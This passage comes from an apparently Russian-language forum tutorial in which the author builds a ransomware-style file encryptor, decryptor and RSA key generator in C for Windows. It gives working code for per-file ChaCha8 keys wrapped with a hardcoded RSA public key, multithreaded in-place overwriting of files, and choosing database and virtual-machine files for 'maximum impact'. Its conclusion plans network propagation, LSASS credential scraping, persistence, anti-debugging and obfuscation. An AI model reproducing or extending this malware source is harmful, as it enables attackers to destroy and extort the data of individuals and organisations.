The RSA encapsulation process follows a straightforward workflow. For each target file, the system generates a fresh 32-byte ChaCha8 key and 12-byte initialization vector using the Windows cryptographically secure random number generator. These key materials are then concatenated and encrypted using the RSA public key:
Код:
BOOL GenerateEncryptionKey(HCRYPTPROV provider, HCRYPTKEY publicKey, PFILE_INFO fileInfo) {
// Generate random ChaCha8 key and IV
if (!CryptGenRandom(provider, KEY_SIZE, fileInfo->chachaKey) ||
!CryptGenRandom(provider, IV_SIZE, fileInfo->chachaIV)) {
return FALSE;
}
// Combine key and IV for RSA encryption
memcpy(fileInfo->encryptedKey, fileInfo->chachaKey, KEY_SIZE);
memcpy(fileInfo->encryptedKey + KEY_SIZE, fileInfo->chachaIV, IV_SIZE);
// Encrypt the combined key material with RSA
DWORD dwDataLen = KEY_SIZE + IV_SIZE;
if (!CryptEncrypt(publicKey, 0, TRUE, 0, fileInfo->encryptedKey,
&dwDataLen, ENCRYPTED_KEY_SIZE)) {
return FALSE;
}
return TRUE;
}
To wrap up this section, we use Win CryptoAPI for a simple yet effective solution by abstracting complex cryptographic details such as padding schemes like PKCS#1 (I constantly have headaches with padding schemes for reasons unknown). This allows our walk through focus on integrating ChaCha8 and file processing without getting bogged down in RSA intricacies. The hardcoded public key approach further simplifies deployment by removing the need for key distribution.
RSA Key generator:
Код:
/******************************************************************************************
* *
* ██████╗ ███████╗███╗ ███╗██╗ ██╗███████╗ ██████╗ ███████╗ █████╗ *
* ██╔══██╗██╔════╝████╗ ████║╚██╗ ██╔╝██╔════╝ ██╔══██╗██╔════╝██╔══██╗ *
* ██████╔╝█████╗ ██╔████╔██║ ╚████╔╝ ███████╗ ██████╔╝███████╗███████║ *
* ██╔══██╗██╔══╝ ██║╚██╔╝██║ ╚██╔╝ ╚════██║ ██╔══██╗╚════██║██╔══██║ *
* ██║ ██║███████╗██║ ╚═╝ ██║ ██║ ███████║ ██║ ██║███████║██║ ██║ *
* *
* REMY’S RSA KEY GENERATOR *
* Export RSA key blobs as C-style arrays *
* *
* Output rsa_keys.h with embedded importable key blobs *
* Use with CryptoAPI: CryptImportKey / CryptExportKey *
* *
* Author: Remy | Version: 1.0 *
* *
*******************************************************************************************/
#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <wincrypt.h>
// Output a byte array in C format - 16 bytes per line
void OutputByteArrayToFile(FILE* file, const BYTE* data, DWORD dataLen, const char* arrayName) {
fprintf(file, “// %s (%d bytes)\n”, arrayName, dataLen);
fprintf(file, “static const BYTE %s[] = {\n “, arrayName);
for (DWORD i = 0; i < dataLen; i++) {
fprintf(file, “0x%02X”, data[i]);
// Add comma if not the last byte
if (i < dataLen - 1) {
fprintf(file, “, “);
}
// Line break every 16 bytes for readability
if ((i + 1) % 16 == 0 && i < dataLen - 1) {
fprintf(file, “\n “);
}
}
fprintf(file, “\n};\n\n”);
}
// Main function
int main() {
HCRYPTPROV cryptoProvider = 0;
HCRYPTKEY publicKey = 0;
BOOL success = FALSE;
printf(“RSA Key Generator - Byte Array Format\n”);
printf(“——————————————————\n\n”);
// Get the provider context
printf(“Acquiring cryptographic provider…\n”);
if (!CryptAcquireContextW(&cryptoProvider, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
if (!CryptAcquireContextW(&cryptoProvider, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET)) {
printf(“Failed to acquire crypto context. Error: %d\n”, GetLastError());
return 1;
}
}
// Generate RSA key pair - 2048 bits (0x08000000) and exportable
printf(“Generating 2048-bit RSA key pair…\n”);
if (!CryptGenKey(cryptoProvider, AT_KEYEXCHANGE, 0x08000000 | CRYPT_EXPORTABLE, &publicKey)) {
printf(“Failed to generate RSA key pair. Error: %d\n”, GetLastError());
CryptReleaseContext(cryptoProvider, 0);
return 1;
}
// Create output file
FILE* outputFile = fopen(“rsa_keys.h”, “w”);
if (!outputFile) {
printf(“Failed to create output file\n”);
CryptDestroyKey(publicKey);
CryptReleaseContext(cryptoProvider, 0);
return 1;
}
// Write file header
fprintf(outputFile, “// RSA Key Pair - Generated on %s\n”, __DATE__);
fprintf(outputFile, “// DO NOT SHARE THE PRIVATE KEY!\n\n”);
fprintf(outputFile, “#ifndef RSA_KEYS_H\n”);
fprintf(outputFile, “#define RSA_KEYS_H\n\n”);
fprintf(outputFile, “#include <windows.h>\n\n”);
// Add import function declaration
fprintf(outputFile, “// Function to import the public key\n”);
fprintf(outputFile, “inline BOOL ImportPublicKey(HCRYPTPROV cryptoProvider, HCRYPTKEY* publicKey) {\n”);
fprintf(outputFile, “ return CryptImportKey(\n”);
fprintf(outputFile, “ cryptoProvider,\n”);
fprintf(outputFile, “ g_publicKeyBlob,\n”);
fprintf(outputFile, “ sizeof(g_publicKeyBlob),\n”);
fprintf(outputFile, “ 0,\n”);
fprintf(outputFile, “ 0,\n”);
fprintf(outputFile, “ publicKey\n”);
fprintf(outputFile, “ );\n”);
fprintf(outputFile, “}\n\n”);
fprintf(outputFile, “// Function to import the private key (only use when decrypting)\n”);
fprintf(outputFile, “inline BOOL ImportPrivateKey(HCRYPTPROV cryptoProvider, HCRYPTKEY* privateKey) {\n”);
fprintf(outputFile, “ return CryptImportKey(\n”);
fprintf(outputFile, “ cryptoProvider,\n”);
fprintf(outputFile, “ g_privateKeyBlob,\n”);
fprintf(outputFile, “ sizeof(g_privateKeyBlob),\n”);
fprintf(outputFile, “ 0,\n”);
fprintf(outputFile, “ 0,\n”);
fprintf(outputFile, “ privateKey\n”);
fprintf(outputFile, “ );\n”);
fprintf(outputFile, “}\n\n”);
// Export and write the public key
printf(“Exporting public key as byte array…\n”);
DWORD pubKeyBlobLen = 0;
if (CryptExportKey(publicKey, 0, PUBLICKEYBLOB, 0, NULL, &pubKeyBlobLen)) {
BYTE* pubKeyBlob = (BYTE*)malloc(pubKeyBlobLen);
if (pubKeyBlob) {
if (CryptExportKey(publicKey, 0, PUBLICKEYBLOB, 0, pubKeyBlob, &pubKeyBlobLen)) {
OutputByteArrayToFile(outputFile, pubKeyBlob, pubKeyBlobLen, “g_publicKeyBlob”);
printf(“Public key exported successfully (%d bytes)\n”, pubKeyBlobLen);
}
else {
printf(“Failed to export public key. Error: %d\n”, GetLastError());
}
free(pubKeyBlob);
}
}
else {
printf(“Failed to get public key size. Error: %d\n”, GetLastError());
}
// Export and write the private key
printf(“Exporting private key as byte array…\n”);
DWORD privKeyBlobLen = 0;
if (CryptExportKey(publicKey, 0, PRIVATEKEYBLOB, 0, NULL, &privKeyBlobLen)) {
BYTE* privKeyBlob = (BYTE*)malloc(privKeyBlobLen);
if (privKeyBlob) {
if (CryptExportKey(publicKey, 0, PRIVATEKEYBLOB, 0, privKeyBlob, &privKeyBlobLen)) {
OutputByteArrayToFile(outputFile, privKeyBlob, privKeyBlobLen, “g_privateKeyBlob”);
printf(“Private key exported successfully (%d bytes)\n”, privKeyBlobLen);
}
else {
printf(“Failed to export private key. Error: %d\n”, GetLastError());
}
free(privKeyBlob);
}
}
else {
printf(“Failed to get private key size. Error: %d\n”, GetLastError());
}
// Close header guard
fprintf(outputFile, “#endif // RSA_KEYS_H\n”);
// Close file
fclose(outputFile);
// Cleanup
if (publicKey) {
CryptDestroyKey(publicKey);
}
if (cryptoProvider) {
CryptReleaseContext(cryptoProvider, 0);
}
printf(“\nKey generation complete!\n”);
printf(“Keys saved to rsa_keys.h as byte arrays ready for copy/paste\n”);
printf(“Press Enter to exit…”);
getchar();
return 0;
}
III. Writing the Hybrid Crypto Logic
Now that we’ve established our ChaCha8 library and RSA key encapsulation system, let’s examine how we can use these components together in a complete file encryption implementation. The hybrid approach we’ll take demonstrates how to efficiently process multiple files using a multi threaded architecture while maintaining decently strong cryptographic security.
The core challenge in designing an effective file encryption system lies in balancing cryptographic strength, performance throughput and system resource utilization. Our implementation addresses this through a producer/consumer threading model combined with adaptive encryption strategies that optimize processing based on file characteristics. The system maintains separate encryption contexts per file while leveraging shared cryptographic providers to minimize th e initialization overhead.
Core Data Structures and Memory Management
The implementation relies on several key structures that organize file information, encryption context and work distribution. These structures are designed to minimize memory allocations and enable efficient data flow between threads.
C:
typedef struct {
BYTE encryptedKey[ENCRYPTED_KEY_SIZE];
BYTE encryptMode;
BYTE dataPercent;
LONGLONG originalFileSize;
} FILE_HEADER;
typedef struct {
WCHAR filename[MAX_PATH_LEN];
HANDLE fileHandle;
LONGLONG fileSize;
BYTE chachaKey[KEY_SIZE];
BYTE chachaIV[IV_SIZE];
chacha_ctx cryptCtx;
BYTE encryptedKey[ENCRYPTED_KEY_SIZE];
} FILE_INFO, *PFILE_INFO;
The FILE_HEADER structure serves as the cryptographic metadata container appended to each encrypted file. It stores the RSA encrypted ChaCha8 key material, encryption mode indicators for the decryption process and the original file size required for proper file reconstruction. The ENCRYPTED_KEY_SIZE of 524 bytes accommodates the RSA2048 encrypted output with PKCS#1 padding ensuring sufficient space for the 44byte key + IV combination after RSA encryption.
The FILE_INFO structure maintains the complete encryption context for a single file operation. It contains both plaintext ChaCha8 materials (which are zeroed after use) and the RSA encrypted key data that persists in the file header. The embedded chacha_ctx maintains the algorithm’s internal state, allowing for streaming encryption operations across multiple buffer chunks without reinitializing the cipher context.
Multithreading
To maximize encryption throughput across modern multiple cores, the implementation employs a threadsafe producer/consumer pattern. This architecture decouples file discovery from encryption processing, allowing the most optimal resource utilization.
C:
typedef struct {
PWORK_ITEM items[1000];
int count;
CRITICAL_SECTION cs;
HANDLE semaphore;
} WORK_QUEUE;
void EnqueueWork(PWORK_ITEM workItem) {
EnterCriticalSection(&g_workQueue.cs);
if (g_workQueue.count < 1000) {
g_workQueue.items[g_workQueue.count++] = workItem;
LeaveCriticalSection(&g_workQueue.cs);
ReleaseSemaphore(g_workQueue.semaphore, 1, NULL);
} else {
LeaveCriticalSection(&g_workQueue.cs);
if (workItem->fileInfo) free(workItem->fileInfo);
free(workItem);
}
}
The work queue uses Windows synchronization primitives to coordinate between the main discovery thread and multiple worker threads while the critical section protects queue modifications while the semaphore provides efficient thread blocking and signalling. A fixed size queue (1000 items) prevents unbounded memory growth during large directory traversals while providing sufficient buffering for sustained throughput.
The worker threads operate independently with dedicated 5MB buffers (allocated via VirtualAlloc) for optimal memory alignment and reduced fragmentation. Each thread maintains its own buffer to eliminate contention and enable true parallel processing of multiple files simultaneously.
Adaptive Encryption Strategies Based on File Characteristics
Rather than applying uniform encryption to all files, the system employs intelligent strategies based on file type and size characteristics. This approach optimizes for both processing speed and operational impact while maintaining cryptographic security.
C:
BOOL ProcessFile(PFILE_INFO fileInfo, LPBYTE buffer, HCRYPTPROV cryptoProvider, HCRYPTKEY publicKey) {
if (!GenerateEncryptionKey(cryptoProvider, publicKey, fileInfo) ||
!OpenFileForEncryption(fileInfo)) {
return FALSE;
}
// Database files - encrypt completely for maximum impact
if (wcsstr(fileInfo->filename, L".db") || wcsstr(fileInfo->filename, L".sql") ||
wcsstr(fileInfo->filename, L".mdb") || wcsstr(fileInfo->filename, L".accdb")) {
if (!WriteEncryptHeader(fileInfo, FULL_ENCRYPT, 0)) return FALSE;
return EncryptFileCompletely(fileInfo, buffer);
}
// VM files - partial encryption to corrupt while maintaining some structure
else if (wcsstr(fileInfo->filename, L".vdi") || wcsstr(fileInfo->filename, L".vhd") ||
wcsstr(fileInfo->filename, L".vmdk")) {
if (!WriteEncryptHeader(fileInfo, PARTLY_ENCRYPT, 20)) return FALSE;
return EncryptFilePartially(fileInfo, buffer, 20);
}
// Size-based strategy for general files
else {
if (fileInfo->fileSize <= 1048576) { // <= 1MB
if (!WriteEncryptHeader(fileInfo, FULL_ENCRYPT, 0)) return FALSE;
return EncryptFileCompletely(fileInfo, buffer);
}
else if (fileInfo->fileSize <= 5242880) { // <= 5MB
if (!WriteEncryptHeader(fileInfo, HEADER_ENCRYPT, 0)) return FALSE;
return EncryptFileHeader(fileInfo, buffer);
}
else { // > 5MB
if (!WriteEncryptHeader(fileInfo, PARTLY_ENCRYPT, 50)) return FALSE;
return EncryptFilePartially(fileInfo, buffer, 50);
}
}
}
The adaptive strategy recognizes that different file types have varying sensitivity to partial corruption. Database files receive complete encryption since any corruption typically renders them entirely unusable, maximizing operational impact. Virtual machine files use targeted partial encryption at 20% coverage, which corrupts critical metadata while maintaining enough structure to suggest recoverability. For general files, the size-based approach balances processing time with effectiveness. Files under 1MB are fully encrypted with minimal performance impact, while files between 1-5MB receive header-only encryption that corrupts file format signatures and metadata. Large files over 5MB use 50% partial encryption distributed across the file to ensure sufficient corruption while maintaining reasonable processing times.
ChaCha8 Integration and Cryptographic Key Management
The integration between RSA key protection and ChaCha8 file encryption demonstrates proper hybrid cryptography implementation. Each file receives cryptographically independent key material while leveraging shared RSA infrastructure for key protection.
C:
BOOL GenerateEncryptionKey(HCRYPTPROV provider, HCRYPTKEY publicKey, PFILE_INFO fileInfo) {
// Generate cryptographically strong random key and IV
if (!CryptGenRandom(provider, KEY_SIZE, fileInfo->chachaKey) ||
!CryptGenRandom(provider, IV_SIZE, fileInfo->chachaIV)) {
return FALSE;
}
// Initialize ChaCha8 context with generated materials
chacha_keysetup(&fileInfo->cryptCtx, fileInfo->chachaKey, 256);
chacha_ivsetup(&fileInfo->cryptCtx, fileInfo->chachaIV);
// Prepare key+IV for RSA encryption
memcpy(fileInfo->encryptedKey, fileInfo->chachaKey, KEY_SIZE);
memcpy(fileInfo->encryptedKey + KEY_SIZE, fileInfo->chachaIV, IV_SIZE);
// Encrypt with RSA public key using PKCS#1 padding
DWORD dwDataLen = KEY_SIZE + IV_SIZE;
if (!CryptEncrypt(publicKey, 0, TRUE, 0, fileInfo->encryptedKey,
&dwDataLen, ENCRYPTED_KEY_SIZE)) {
return FALSE;
}
return TRUE;
}
The key generation process uses Windows CryptoAPI's CryptGenRandom function, which provides cryptographically secure pseudorandom number generation (PRNG) suitable for key material. Each file receives a fresh 32byte ChaCha8 key and 8-byte IV, ensuring cryptographic independence between files. The ChaCha8 context initialization prepares the cipher's internal state for subsequent encryption operations.
The RSA encryption combines the 32-byte key and 8byte IV into a 40byte payload, which is then encrypted using the public key with PKCS#1 v1.5 padding. This results in a 256-byte ciphertext for RSA2048, providing both confidentiality and integrity for the symmetric key material. The padding scheme ensures semantic security, making identical key+IV combinations produce different RSA ciphertexts.
Streaming File Processing and Header Management
The system processes files using streaming operations to maintain constant memory usage regardless of file size. This approach enables encryption of arbitrarily large files while preserving system responsiveness and memory efficiency.
C:
BOOL WriteEncryptHeader(PFILE_INFO fileInfo, BYTE encryptMode, BYTE dataPercent) {
FILE_HEADER header;
LARGE_INTEGER offset;
// Prepare header with encryption metadata
header.encryptMode = encryptMode;
header.dataPercent = dataPercent;
header.originalFileSize = fileInfo->fileSize;
memcpy(header.encryptedKey, fileInfo->encryptedKey, ENCRYPTED_KEY_SIZE);
// Append header to end of file
offset.QuadPart = 0;
if (!SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_END)) {
return FALSE;
}
// Write header and finalize file
BOOL success = WriteFullData(fileInfo->fileHandle, &header, sizeof(FILE_HEADER));
if (success) {
SetEndOfFile(fileInfo->fileHandle);
offset.QuadPart = 0;
SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_BEGIN);
}
return success;
}
The header-at-end approach allows the encryption process to work with file contents first, then append the decryption metadata. This design simplifies the encryption logic since it doesn’t require shifting existing file data to accommodate a header at the beginning. The header contains all information necessary for decryption: the RSA-encrypted key material, encryption mode indicators, percentage of data encrypted, and original file size for proper restoration.
The WriteFullData function ensures atomic write operations by handling partial writes that can occur with large buffers or under system load. It continues writing until all data is committed to storage, preventing corruption from incomplete writes that could render files unrecoverable even with the correct decryption key.
Performance Optimizations and Buffer Management
Several design decisions optimize encryption throughput while maintaining cryptographic security. The implementation prioritizes streaming operations, buffer reuse, and minimal system call overhead to achieve maximum performance.
C:
BOOL EncryptFileCompletely(PFILE_INFO fileInfo, LPBYTE buffer) {
DWORD bytesRead, bytesToRead;
LONGLONG totalRead = 0;
LARGE_INTEGER offset;
while (totalRead < fileInfo->fileSize) {
LONGLONG bytesLeft = fileInfo->fileSize - totalRead;
bytesToRead = (bytesLeft > BUFFER_SIZE) ? BUFFER_SIZE : (DWORD)bytesLeft;
// Read chunk into buffer
if (!ReadFile(fileInfo->fileHandle, buffer, bytesToRead, &bytesRead, NULL) ||
bytesRead == 0) break;
// Encrypt in-place to minimize memory operations
chacha_encrypt(&fileInfo->cryptCtx, buffer, buffer, bytesRead);
// Seek back and write encrypted data
offset.QuadPart = -(LONGLONG)bytesRead;
SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_CURRENT);
if (!WriteFullData(fileInfo->fileHandle, buffer, bytesRead)) break;
totalRead += bytesRead;
}
return (totalRead == fileInfo->fileSize);
}
The streaming approach processes files in 5MB chunks. Each worker thread maintains a dedicated buffer allocated with VirtualAlloc for optimal memory alignment and reduced fragmentation. Inplace encryption minimizes memory copies by using the same buffer for both input and output data, taking advantage of chacha8 ability to encrypt data in place without requiring separate source and destination buffers. File pointer manipulation using SetFilePointerEx with negative offsets enables the read encrypt write back pattern necessary for the in place file modification. This approach avoids creating temporary files while ensuring the original file content is properly overwritten with encrypted data, crucial for encryptor usecase. The LARGE_INTEGER file positioning supports files larger than 4GB, ensuring compatibility with modern file sizes.
Cryptographic Hygiene
The implementation incorporates several design elements that ensure good cryptographic strength while preventing common vulnerabilities. These measures provide defense against both cryptographic attacks & exploits. Proper resource management ensures that file handles are closed before renaming operations, preventing sharing violations that could leave files in inconsistent states and we gracefully handle locked files by skipping them rather than failing, maintaining operational continuity in multi user environment where files may be actively in use. Any memory containing sensitive key material should be securely cleared after use using SecureZeroMemory or similar functions to prevent key recovery from mrmory dumps or swap files, though this detail is omitted from the shown code for brevity.
Excellent, now lets write the decryptor…
IV. Writing the Hybrid Decryption Logic
The decryption process essentially reverses our encryption workflow, but requires careful attention to key recovery, file integrity validation and proper restoration of original file structures to ensure we dont fuck our data. Our decryptor will safely reconstruct files from their encrypted state while maintaining the same multithreaded architecture for optimal performance.
The core challenge in decryption lies in securely recovering the ChaCha8 key material from RSA encrypted headers and ensuring complete file restoration without data loss. Our implementation addresses this through systematic header parsing, robust key decryption, and adaptive processing strategies that mirror the original encryption modes.
Key Recovery & RSA Decryption
The decryption process begins with importing the RSA private key and establishing the cryptographic context. Unlike the encryptor which generates keys the decryptor must locate and import existing private key material to recover the symmetric encryption keys.
C:
BOOL InitializeCrypto(HCRYPTPROV* cryptoProvider, HCRYPTKEY* privateKey) {
// Acquire cryptographic provider
if (!CryptAcquireContextW(cryptoProvider, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
if (!CryptAcquireContextW(cryptoProvider, NULL, MS_ENHANCED_PROV, PROV_RSA_FULL, CRYPT_NEWKEYSET)) {
return FALSE;
}
}
// Locate private key file in executable directory
WCHAR keyFilePath[MAX_PATH];
GetModuleFileNameW(NULL, keyFilePath, MAX_PATH);
WCHAR* lastSlash = wcsrchr(keyFilePath, L'\\');
if (lastSlash) {
*(lastSlash + 1) = L'\0';
wcscat_s(keyFilePath, MAX_PATH, L"encro_key.bin.priv");
// Import private key from file
HANDLE hFile = CreateFileW(keyFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) {
DWORD keyBlobLen = GetFileSize(hFile, NULL);
BYTE* keyBlob = (BYTE*)malloc(keyBlobLen);
DWORD bytesRead;
if (ReadFile(hFile, keyBlob, keyBlobLen, &bytesRead, NULL) && bytesRead == keyBlobLen) {
CryptImportKey(*cryptoProvider, keyBlob, keyBlobLen, 0, 0, privateKey);
}
free(keyBlob);
CloseHandle(hFile);
}
}
return (*privateKey != 0);
}
The key import process requires the RSA private key file generated during encryption. This file contains the PRIVATEKEYBLOB exported by the encryptor, allowing the decryptor to recover the original RSA key pair needed for symmetric key decryption.
Header Parsing and Metadata Recovery
Each encrypted file contains a FILE_HEADER structure appended at the end, containing all metadata necessary for proper decryption. The decryptor must carefully parse this header to recover encryption parameters and the RSA-encrypted ChaCha8 key material.
C:
BOOL ReadEncryptHeader(PFILE_INFO fileInfo) {
LARGE_INTEGER offset;
DWORD bytesRead;
// Seek to header position (file size - header size)
offset.QuadPart = fileInfo->fileSize - sizeof(FILE_HEADER);
if (!SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_BEGIN)) {
return FALSE;
}
// Read header structure
if (!ReadFile(fileInfo->fileHandle, &fileInfo->header, sizeof(FILE_HEADER), &bytesRead, NULL) ||
bytesRead != sizeof(FILE_HEADER)) {
return FALSE;
}
// Remove header from file by truncating
if (!SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_BEGIN) ||
!SetEndOfFile(fileInfo->fileHandle)) {
return FALSE;
}
// Reset file pointer for decryption
offset.QuadPart = 0;
return SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_BEGIN);
}
The header reading process removes the metadata from the file during parsing, immediately restoring the file to its encrypted-content-only state. This approach ensures that the decryption process works with clean file boundaries matching the original encrypted data size.
ChaCha8 Key Recovery and Context Initialization
Once the header is parsed, the RSA-encrypted key material must be decrypted to recover the original ChaCha8 key and IV. This process requires careful handling of the PKCS#1 padding and proper initialization of the ChaCha8 context.
C:
BOOL DecryptCryptoKey(HCRYPTPROV provider, HCRYPTKEY privateKey, PFILE_INFO fileInfo) {
DWORD dwDataLen = ENCRYPTED_KEY_SIZE;
BYTE tempKey[ENCRYPTED_KEY_SIZE];
// Copy encrypted key data for decryption
memcpy(tempKey, fileInfo->header.encryptedKey, ENCRYPTED_KEY_SIZE);
// Decrypt using RSA private key
if (!CryptDecrypt(privateKey, 0, TRUE, 0, tempKey, &dwDataLen)) {
return FALSE;
}
// Extract ChaCha8 key and IV from decrypted data
memcpy(fileInfo->chachaKey, tempKey, KEY_SIZE);
memcpy(fileInfo->chachaIV, tempKey + KEY_SIZE, IV_SIZE);
// Initialize ChaCha8 context for decryption
memset(&fileInfo->cryptCtx, 0, sizeof(fileInfo->cryptCtx));
chacha_keysetup(&fileInfo->cryptCtx, fileInfo->chachaKey, 256);
chacha_ivsetup(&fileInfo->cryptCtx, fileInfo->chachaIV);
return TRUE;
}
The key recovery process uses the same ChaCha8 context initialization as encryption. Since ChaCha8 is a stream cipher, the same keystream used for encryption will perfectly reverse the process when applied to the encrypted data, restoring the original plaintext.
Adaptive Decryption Based on Encryption Mode
The decryptor must support the same adaptive strategies used during encryption, processing files according to their stored encryption mode and parameters. This ensures proper restoration regardless of which encryption strategy was originally applied.
C:
BOOL ProcessFile(PFILE_INFO fileInfo, LPBYTE buffer, HCRYPTPROV cryptoProvider, HCRYPTKEY privateKey) {
// Parse header and recover keys
if (!ReadEncryptHeader(fileInfo) ||
!DecryptCryptoKey(cryptoProvider, privateKey, fileInfo)) {
return FALSE;
}
// Apply appropriate decryption strategy
switch (fileInfo->header.encryptMode) {
case FULL_ENCRYPT:
return DecryptFileCompletely(fileInfo, buffer);
case PARTLY_ENCRYPT:
return DecryptFilePartially(fileInfo, buffer, fileInfo->header.dataPercent);
case HEADER_ENCRYPT:
return DecryptFileHeader(fileInfo, buffer);
default:
return FALSE; // Unknown encryption mode
}
}
Mode based processing ensures that files encrypted with different strategies are properly restored. DataPercent field from the header provides the exact parameters needed to reconstruct partially encrypted files with the correct block sizes and step intervals.
Streaming Decryption and File Restoration
The decryption process mirrors the encryption streaming approach, processing files in chunks while maintaining constant memory usage with key difference is that ChaCha8's symmetric nature allows the same encryption function to serve as decryption.
C:
BOOL DecryptFileCompletely(PFILE_INFO fileInfo, LPBYTE buffer) {
DWORD bytesRead, bytesToRead;
LONGLONG totalRead = 0;
LONGLONG bytesToDecrypt = fileInfo->header.originalFileSize;
LARGE_INTEGER offset;
while (totalRead < bytesToDecrypt) {
LONGLONG bytesLeft = bytesToDecrypt - totalRead;
bytesToRead = (bytesLeft > BUFFER_SIZE) ? BUFFER_SIZE : (DWORD)bytesLeft;
// Read encrypted data
if (!ReadFile(fileInfo->fileHandle, buffer, bytesToRead, &bytesRead, NULL) ||
bytesRead == 0) break;
// Decrypt in-place (ChaCha8 encryption/decryption is identical)
chacha_encrypt(&fileInfo->cryptCtx, buffer, buffer, bytesRead);
// Write back decrypted data
offset.QuadPart = -(LONGLONG)bytesRead;
SetFilePointerEx(fileInfo->fileHandle, offset, NULL, FILE_CURRENT);
if (!WriteFullData(fileInfo->fileHandle, buffer, bytesRead)) break;
totalRead += bytesRead;
}
return (totalRead == bytesToDecrypt);
}
Streaming decryption maintains the same in place processing approach as encryption, minimizing memory overhead and enabling efficient processing of large files. The originalFileSize from the header ensures that decryption processes exactly the correct amount of data, preventing over-processing that could corrupt the restored file.
File Restoration and Extension Management
Once decryption is complete, the system must restore the original filename by removing the encryption extension. This process ensures that decrypted files return to their original state and can be properly accessed by applications.
C:
void RestoreFileName(const WCHAR* encryptedName) {
WCHAR originalName[MAX_PATH_LEN];
wcscpy_s(originalName, MAX_PATH_LEN, encryptedName);
// Find and remove encryption extension
WCHAR* extension = wcsstr(originalName, L”.enc”);
if (extension) {
*extension = L’\0’; // Truncate at extension
// Attempt file rename with retry logic
if (!MoveFileW(encryptedName, originalName)) {
Sleep(100); // Brief delay for file system
MoveFileW(encryptedName, originalName);
}
}
}
The filename restoration includes retry logic to handle temporary file system locks or sharing violations that might prevent immediate renaming. This approach ensures smooth operation in multi user environments where files might be briefly locked by EDRs or other system processes. The decryptor includes comprehensive error handling to manage various failure scenarios gracefully. Invalid headers, corrupted key material, or incomplete files are detected and handled without crashing the decryption process. Files that cannot be decrypted due to corruption, missing headers, or invalid keys are skipped rather than causing the entire process to fail. This ensures that partial recovery is possible even when some files in a dataset are damaged. The multi-threaded architecture maintains processing continuity, allowing successful decryptions to proceed while problematic files are handled separately. The implementation also includes proper cleanup of cryptographic resources and file handles, ensuring that system resources are released even when errors occur during processing. This approach maintains system stability and prevents resource leaks that could impact system performance during large-scale decryption operations. And there we have it. Our Basic Encryptor / Decryptor and key generator.
V. Conclusion and Future Directions
So there we have it, our project now combines a reduced-round ChaCha8 stream cipher for high-speed symmetric encryption with RSA-2048 for secure per-file key encapsulation. The hybrid model we’ve implemented is designed to be simple, efficient, and highly modular — separating the encryption logic, key management, threading system, and file handling into clean, swappable components. The result is a fast, multithreaded engine capable of encrypting large volumes of files with minimal resource overhead.
Nice.
At this stage our implementation is primarily educational. A clear, working demonstration of modern crypto principles in action. But there’s plenty of room to expand. Planned improvements include full drive enumeration and smarter file discovery techniques using system APIs and registry lookups, enabling deeper reach across local and removable volumes. On the cryptographic side, the current hardcoded RSA key can be replaced with dynamic key generation and possibly elliptic curve based methods like X25519 for faster, smaller key exchange. We can also looking into refining the threadpool architecture to support better scaling on multi core systems. Integrating a scanning module would allow enumeration of SMB shares, remote drives, and nearby hosts pushing the system beyond the local machine. Combined with LSASS memory scraping or token impersonation, it could automatically propagate and encrypt across an entire subnet. Stealth enhancements are also on the table: userland anti-hooking, basic anti-debugging, simple persistence via registry or scheduled tasks, and eventually code obfuscation to make reverse engineering harder. Realistically theres a LOT to be added to make this even remotely close to a functional encryptor for real use cases, however thee cryptographic foundations and engine is solid for demonstrative purposes.
Thanks for reading.
- Remy
”Take more chances, dance more dances…”
Последнее редактирование: